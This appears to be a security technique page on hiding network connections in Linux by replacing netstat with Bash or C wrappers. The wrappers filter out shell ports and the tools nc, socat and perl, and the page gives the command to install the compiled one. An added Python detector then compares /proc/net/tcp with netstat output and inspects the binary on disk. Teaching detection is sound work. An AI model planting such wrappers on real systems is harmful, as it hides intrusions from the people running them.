Secondary Categories: 02-Defense Evasion

There are many different tools on Linux for viewing network connections. Entries can be hidden from them using one of two methods:

Both methods rely on the original binary still being on the system: we move the file and rename it, then place our new binary or script at a path that is searched before the original file.

# We are moving the original
mv /bin/netstat /usr/sbin/ns.bak

Bash:

In this case "$@" ensures that any parameters passed by the user are also passed through to the original binary.

#!/bin/bash
# Run the renamed original with the user's arguments, then drop matching lines
/usr/sbin/ns.bak "$@" | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'

C:

In the example below the same grep filter is built into a compiled C wrapper, removing lines that match common ports used for bind shells or reverse shells.

#include <string.h>
#include <unistd.h>

int main(int argc, char **argv) {
  /* argv for /bin/sh: "sh -c CMD $0 $1 ..."; static so the large array is not on the stack */
  static char *c[999999] = {"sh", "-c",
    "/usr/sbin/ns.bak $* | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'"};
  /* copy the caller's argv after the command so $* expands to the original arguments */
  memcpy(c + 3, argv, sizeof(char *) * argc);
  execv("/bin/sh", c);
  return 1; /* only reached if execv fails */
}

Compiling the binary:

gcc -xc /tmp/.netstat.c -o /usr/bin/netstat
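Because both wrappers sit between the user and the real binary, a defender detects them by not trusting netstat at all: read /proc/net/tcp directly and diff it against what the tool prints, and inspect the binary on disk for wrapper tell-tales such as a shebang or an embedded grep pipeline. The Python below is an added example written for this page, not code from the original; the /proc/net/tcp snippet and the netstat listing it parses are constructed samples, and the marker strings it searches for are assumptions about what wrappers like the ones above leave behind.

```python
"""Detect a wrapped or replaced netstat without trusting the netstat binary (added example)."""
import re

# Partial map of kernel TCP state codes as they appear in /proc/net/tcp.
TCP_STATES = {"01": "ESTABLISHED", "06": "TIME_WAIT", "0A": "LISTEN"}

# Constructed sample of /proc/net/tcp: sshd on 22, a listener on 4444 (0x115C),
# and an established connection on 1337 (0x0539) from 10.0.0.10:50000 (0xC350).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0539 0A00000A:C350 01 00000000:00000000 00:00000000 00000000  1000        0 12347 1 0000000000000000 20 4 30 10 -1
"""

# Constructed sample of what a filtered netstat -ant prints: only sshd survives the grep.
SAMPLE_FILTERED_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
"""

# Assumed tell-tales of a wrapper; a genuine net-tools netstat contains none of these.
WRAPPER_MARKERS = (b"grep -E", b"grep -v", b"| grep", b".bak")


def _hex_addr(token):
    """Turn 'IIIIIIII:PPPP' from /proc/net/tcp into ('a.b.c.d', port). IPv4 is stored little-endian."""
    ip_hex, port_hex = token.split(":")
    octets = [int(ip_hex[i:i + 2], 16) for i in (6, 4, 2, 0)]
    return ".".join(str(o) for o in octets), int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse the kernel's socket table; the header line is skipped."""
    entries = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        entries.append({
            "local": _hex_addr(fields[1]),
            "remote": _hex_addr(fields[2]),
            "state": TCP_STATES.get(fields[3], fields[3]),
        })
    return entries


def reported_ports(netstat_output):
    """Collect every local and remote port number a netstat-style listing mentions."""
    ports = set()
    for line in netstat_output.splitlines():
        if not line.startswith(("tcp", "udp")):
            continue
        for token in line.split()[3:5]:          # local and foreign address columns
            match = re.search(r":(\d+)$", token)
            if match:
                ports.add(int(match.group(1)))
    return ports


def hidden_sockets(proc_entries, ports_seen):
    """Sockets the kernel knows about whose ports never appear in the tool's output."""
    return [e for e in proc_entries
            if e["local"][1] not in ports_seen and e["remote"][1] not in ports_seen]


def inspect_binary_bytes(data):
    """Heuristic findings for the raw bytes of a file that claims to be netstat."""
    findings = []
    if data.startswith(b"#!"):
        findings.append("script, not an ELF executable")
    elif not data.startswith(b"\x7fELF"):
        findings.append("unrecognised file header")
    for marker in WRAPPER_MARKERS:
        if marker in data:
            findings.append("embeds %r" % marker.decode())
    return findings


def inspect_binary(path):
    """Read a file from disk and run the byte-level checks on it."""
    with open(path, "rb") as fh:
        return inspect_binary_bytes(fh.read())


if __name__ == "__main__":
    entries = parse_proc_net_tcp(SAMPLE_PROC_NET_TCP)
    for e in hidden_sockets(entries, reported_ports(SAMPLE_FILTERED_NETSTAT)):
        print("hidden from netstat: %s:%d -> %s:%d %s" % (e["local"] + e["remote"] + (e["state"],)))
    # Constructed wrapper bytes, shaped like the Bash script above.
    for finding in inspect_binary_bytes(b"#!/bin/bash\n/usr/sbin/ns.bak \"$@\" | grep -Ev '4444'\n"):
        print("suspect netstat:", finding)
```

On a live host feed `parse_proc_net_tcp` the contents of /proc/net/tcp (and /proc/net/tcp6, which uses 32 hex digits per address) and `reported_ports` the output of `netstat -ant`, and point `inspect_binary` at every `netstat` found on PATH. The byte checks only catch the crude cases; a compiled wrapper is still an ELF file, which is why the kernel-table diff comes first, and why the package manager's own checksums (`dpkg -V net-tools` or `rpm -V net-tools`) remain the authoritative test of whether the on-disk binary is the one that was installed.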
